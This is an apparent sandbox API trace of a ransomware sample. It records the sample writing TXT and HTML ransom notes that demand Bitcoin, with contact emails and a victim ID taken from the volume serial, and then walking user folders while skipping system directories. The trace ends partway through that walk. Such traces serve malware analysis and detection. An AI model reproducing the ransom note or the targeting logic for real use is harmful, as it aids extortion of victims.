	[0198.646] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.646] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\HELP_DECRYPT_YOUR_FILES.TXT") returned 61
	[0198.646] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.648] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0198.648] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0198.651] CloseHandle (hObject=0x380) returned 1
	[0198.651] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.651] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.652] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0198.653] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0198.653] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.653] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0198.653] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0198.653] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0198.653] CloseHandle (hObject=0x380) returned 1
	[0198.654] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.654] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.654] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0198.654] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\HELP_DECRYPT_YOUR_FILES.HTML") returned 62
	[0198.654] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.664] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0198.664] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0198.667] CloseHandle (hObject=0x380) returned 1
	[0198.667] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.667] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.668] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.668] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0198.669] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.670] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.670] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0198.670] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.670] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0198.670] CloseHandle (hObject=0x380) returned 1
	[0198.670] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\saved games\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8ff19383, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0198.671] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*.*") returned 37
	[0198.671] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.671] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Saved Games\\*.*", cchLength=0x25 | out: lpsz="c:\\users\\rdhj0cnfevzx\\saved games\\*.*") returned 0x25
	[0198.671] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.671] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="windows") returned 0x0
	[0198.671] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.672] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="boot") returned 0x0
	[0198.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.672] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="system volume information") returned 0x0
	[0198.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.672] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0198.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.672] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="temp") returned 0x0
	[0198.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.673] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="program files") returned 0x0
	[0198.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.673] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="program files (x86)") returned 0x0
	[0198.678] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.678] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="appdata") returned 0x0
	[0198.678] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.679] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="application data") returned 0x0
	[0198.679] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.679] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="winnt") returned 0x0
	[0198.679] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.679] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="tmp") returned 0x0
	[0198.679] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.679] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="cache") returned 0x0
	[0198.679] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.680] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="temporary internet files") returned 0x0
	[0198.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.680] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="webcache") returned 0x0
	[0198.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.680] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="inetcache") returned 0x0
	[0198.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.680] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="nvidia") returned 0x0
	[0198.680] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.681] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="packages") returned 0x0
	[0198.681] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.681] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="cookies") returned 0x0
	[0198.681] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.681] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\saved games\\*.*", lpSrch="programdata") returned 0x0
	[0198.681] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0198.681] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0198.681] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8ff19383, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0198.682] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0198.682] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0198.682] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fef32a2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8fef32a2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ff19383, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0198.682] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fef32a2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8fef32a2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8fef32a2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0198.682] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fef32a2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8fef32a2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8fef32a2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0198.682] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0198.682] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0198.683] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1
	[0198.683] lstrcmpW (lpString1="Searches", lpString2="..") returned 1
	[0198.683] lstrcmpW (lpString1="Searches", lpString2=".") returned 1
	[0198.683] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0198.683] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0198.683] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Searches" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches") returned="C:\\Users\\RDhJ0CNFevzX\\Searches"
	[0198.683] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Searches" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches") returned="C:\\Users\\RDhJ0CNFevzX\\Searches"
	[0198.684] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\") returned="C:\\Users\\RDhJ0CNFevzX\\Searches\\"
	[0198.684] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Searches\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\") returned="C:\\Users\\RDhJ0CNFevzX\\Searches\\"
	[0198.684] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Searches\\*.*"
	[0198.684] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Searches\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\searches\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0198.684] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Searches\\*.*") returned 34
	[0198.684] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.685] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Searches\\*.*", cchLength=0x22 | out: lpsz="c:\\users\\rdhj0cnfevzx\\searches\\*.*") returned 0x22
	[0198.685] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.685] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="windows") returned 0x0
	[0198.685] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.685] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="boot") returned 0x0
	[0198.685] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.685] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="system volume information") returned 0x0
	[0198.685] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.686] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0198.686] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.686] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="temp") returned 0x0
	[0198.686] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.686] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="program files") returned 0x0
	[0198.686] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.686] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="program files (x86)") returned 0x0
	[0198.687] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.687] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="appdata") returned 0x0
	[0198.687] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.687] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="application data") returned 0x0
	[0198.687] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.687] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="winnt") returned 0x0
	[0198.687] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.688] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="tmp") returned 0x0
	[0198.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.688] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="cache") returned 0x0
	[0198.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.688] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="temporary internet files") returned 0x0
	[0198.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.688] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="webcache") returned 0x0
	[0198.689] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.796] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="inetcache") returned 0x0
	[0198.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.796] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="nvidia") returned 0x0
	[0198.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.796] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="packages") returned 0x0
	[0198.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.797] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="cookies") returned 0x0
	[0198.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.797] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\*.*", lpSrch="programdata") returned 0x0
	[0198.797] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0198.797] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0198.797] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0198.797] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0198.798] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Searches\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\") returned="C:\\Users\\RDhJ0CNFevzX\\Searches\\"
	[0198.798] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini"
	[0198.798] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini") returned 42
	[0198.798] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.800] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Searches\\desktop.ini", cchLength=0x2a | out: lpsz="c:\\users\\rdhj0cnfevzx\\searches\\desktop.ini") returned 0x2a
	[0198.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.800] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0198.800] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\searches\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\searches\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\searches\\desktop.ini"
	[0198.800] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\searches\\desktop.ini") returned 42
	[0198.800] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.801] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0198.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
